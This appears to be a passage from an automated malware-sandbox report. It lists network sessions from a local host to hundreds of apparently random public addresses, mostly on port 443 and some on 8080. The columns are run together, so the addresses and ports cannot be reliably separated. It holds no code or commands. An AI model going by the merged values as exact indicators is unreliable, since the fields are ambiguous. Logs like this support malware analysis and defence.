                                                        14455192.168.2.144759242.59.201.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14456192.168.2.145269276.49.141.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14457192.168.2.1457360124.48.217.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14458192.168.2.1432888137.71.141.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14459192.168.2.145896448.105.171.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14460192.168.2.1446198146.8.217.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14461192.168.2.1440668139.128.142.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14462192.168.2.144316687.135.153.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14463192.168.2.144124899.217.165.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14464192.168.2.1437636129.93.34.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14465192.168.2.1451434165.176.135.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14466192.168.2.1434136145.194.120.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14467192.168.2.1460722107.157.32.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14468192.168.2.1454136210.84.193.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14469192.168.2.143436479.64.228.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14470192.168.2.144319870.27.32.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14471192.168.2.1445974153.228.60.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14472192.168.2.1447802145.164.35.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14473192.168.2.143509892.18.222.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14474192.168.2.1441606198.41.74.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14475192.168.2.144442096.70.39.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14476192.168.2.1449796170.15.194.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14477192.168.2.1458212113.45.183.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14478192.168.2.1445598162.156.163.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14479192.168.2.1439300115.128.73.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14480192.168.2.1436588223.223.141.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14481192.168.2.1459978107.148.87.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14482192.168.2.143717874.190.206.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14483192.168.2.145794849.168.74.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14484192.168.2.1453326125.90.150.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14485192.168.2.145573882.70.205.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14486192.168.2.1447666141.179.181.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14487192.168.2.144765097.66.163.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14488192.168.2.1433666206.208.146.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14489192.168.2.144538244.85.196.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14490192.168.2.1456632181.67.17.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14491192.168.2.143528625.81.145.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14492192.168.2.143405048.31.232.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14493192.168.2.1448556134.104.53.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14494192.168.2.14427728.157.241.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14495192.168.2.1453580175.195.89.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14496192.168.2.1450572118.175.77.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14497192.168.2.1454276158.187.5.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14498192.168.2.1444950207.162.248.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14499192.168.2.1433102218.249.61.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14500192.168.2.1460732176.160.87.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14501192.168.2.1453056144.242.66.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14502192.168.2.1450450211.129.69.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14503192.168.2.145480243.9.208.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14504192.168.2.145334458.172.82.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14505192.168.2.1459560184.1.227.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14506192.168.2.145220670.47.166.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14507192.168.2.143681279.117.145.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14508192.168.2.143324040.2.187.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14509192.168.2.1452012180.79.221.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14510192.168.2.1437608185.136.78.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14511192.168.2.144952440.196.155.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14512192.168.2.144625814.64.27.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14513192.168.2.14606988.126.121.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14514192.168.2.1436608216.213.72.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14515192.168.2.1440468179.128.154.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14516192.168.2.1451650155.164.31.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14517192.168.2.1456496196.167.114.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14518192.168.2.144045258.4.151.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14519192.168.2.1458190117.172.242.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14520192.168.2.1439904176.26.142.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14521192.168.2.1447534192.95.252.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14522192.168.2.1437872206.62.219.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14523192.168.2.143927899.240.151.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14524192.168.2.143891287.63.18.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14525192.168.2.143505062.0.183.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14526192.168.2.145726863.185.161.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14527192.168.2.1450022121.252.4.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14528192.168.2.143564618.249.12.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14529192.168.2.1453776211.242.113.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14530192.168.2.143481650.211.4.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14531192.168.2.1452354112.9.29.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14532192.168.2.1433660149.47.105.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14533192.168.2.14369482.84.225.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14534192.168.2.1434424124.59.64.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14535192.168.2.144758227.101.40.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14536192.168.2.144875462.122.12.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14537192.168.2.146013450.188.94.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14538192.168.2.143546482.254.201.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14539192.168.2.1445266218.174.46.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14540192.168.2.144530271.19.101.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14541192.168.2.144982498.80.157.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14542192.168.2.1437040203.11.249.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14543192.168.2.1451642124.145.97.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14544192.168.2.1441704147.79.65.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14545192.168.2.144146837.98.223.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14546192.168.2.1436244208.229.92.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14547192.168.2.144520472.142.116.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14548192.168.2.1457564110.2.144.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14549192.168.2.143440439.0.206.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14550192.168.2.144723853.151.143.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14551192.168.2.14489964.183.192.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14552192.168.2.1453654212.172.43.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14553192.168.2.143446485.254.254.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14554192.168.2.145949074.34.212.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14555192.168.2.1446920104.244.235.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14556192.168.2.1456866146.185.243.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14557192.168.2.144313419.161.4.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14558192.168.2.145001080.57.59.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14559192.168.2.1446850114.145.248.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14560192.168.2.1449486157.85.127.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14561192.168.2.1445278178.186.16.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14562192.168.2.145094890.22.73.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14563192.168.2.1457336216.110.228.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14564192.168.2.1440262198.152.252.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14565192.168.2.1442892105.136.109.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14566192.168.2.1438976131.171.190.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14567192.168.2.1447960223.170.140.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14568192.168.2.1443010100.193.254.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14569192.168.2.144975624.248.165.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14570192.168.2.145833099.120.226.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14571192.168.2.1436286209.51.57.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14572192.168.2.1458408117.117.101.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14573192.168.2.1437086157.220.223.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14574192.168.2.1446882116.207.136.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14575192.168.2.144494894.85.244.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14576192.168.2.1456562121.88.241.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14577192.168.2.1441088174.115.219.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14578192.168.2.1434602106.188.84.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14579192.168.2.1455972166.248.73.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14580192.168.2.1457020170.1.156.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14581192.168.2.144019457.254.241.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14582192.168.2.1441206196.94.217.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14583192.168.2.1439440128.25.159.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14584192.168.2.144588041.142.48.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14585192.168.2.1458072209.69.28.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14586192.168.2.1442426212.93.236.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14587192.168.2.1458770134.24.110.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14588192.168.2.1450132111.165.245.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14589192.168.2.1435226149.202.210.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14590192.168.2.144343850.17.223.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14591192.168.2.1459184148.151.174.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14592192.168.2.143537648.64.122.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14593192.168.2.1443686205.217.202.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14594192.168.2.1449824142.15.134.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14595192.168.2.143686672.247.253.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14596192.168.2.1442748194.185.34.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14597192.168.2.144662898.123.95.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14598192.168.2.1450384146.89.117.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14599192.168.2.1454604120.151.245.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14600192.168.2.1445776105.216.161.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14601192.168.2.1455170158.137.75.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14602192.168.2.1443252120.150.251.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14603192.168.2.145870040.63.85.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14604192.168.2.144933467.118.166.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14605192.168.2.1449298131.177.54.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14606192.168.2.145792664.119.226.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14607192.168.2.1435220146.146.102.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14608192.168.2.1435886188.41.195.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14609192.168.2.1450872131.143.94.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14610192.168.2.1433758114.237.141.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14611192.168.2.1439482154.78.182.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14612192.168.2.146081261.107.199.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14613192.168.2.145545660.66.185.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14614192.168.2.145539876.176.235.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14615192.168.2.1440342143.7.185.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14616192.168.2.1457150105.96.61.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14617192.168.2.1437502187.205.221.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14618192.168.2.1438160106.162.53.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14619192.168.2.1453950121.197.39.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14620192.168.2.1460524116.26.84.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14621192.168.2.144747466.113.35.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14622192.168.2.145028677.14.116.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14623192.168.2.144441890.128.23.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14624192.168.2.1447330158.116.205.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14625192.168.2.1447302134.80.17.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14626192.168.2.144908817.228.227.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14627192.168.2.145344896.119.192.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14628192.168.2.1446090197.213.46.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14629192.168.2.144044881.213.11.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14630192.168.2.144105682.230.34.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14631192.168.2.1448068154.211.68.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14632192.168.2.1441644136.231.50.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14633192.168.2.146043813.134.8.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14634192.168.2.1450282154.74.219.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14635192.168.2.1456100167.115.227.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14636192.168.2.1438148101.49.177.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14637192.168.2.1460348114.242.205.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14638192.168.2.1453114175.73.139.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14639192.168.2.1439914139.36.94.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14640192.168.2.143691435.222.222.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14641192.168.2.1450664191.140.75.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14642192.168.2.1439914130.138.109.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14643192.168.2.1452942211.215.47.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14644192.168.2.144070832.157.128.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14645192.168.2.1441790177.207.243.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14646192.168.2.1435358209.44.196.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14647192.168.2.1458500117.21.223.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14648192.168.2.1433252117.21.223.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14649192.168.2.146091414.138.252.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14650192.168.2.1438140173.236.235.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14651192.168.2.1438376106.59.53.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14652192.168.2.145928459.155.153.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14653192.168.2.1449192152.176.89.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14654192.168.2.1458226163.202.208.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14655192.168.2.144724679.38.126.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14656192.168.2.146021020.149.68.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14657192.168.2.144985492.216.166.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14658192.168.2.1439864172.150.149.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14659192.168.2.1446914131.9.99.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14660192.168.2.1458896189.147.104.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14661192.168.2.144519045.14.246.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14662192.168.2.144484068.15.118.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14663192.168.2.145534859.234.165.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14664192.168.2.1445434104.229.254.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14665192.168.2.1443062155.190.227.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14666192.168.2.1443580144.63.118.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14667192.168.2.143977432.60.18.56443
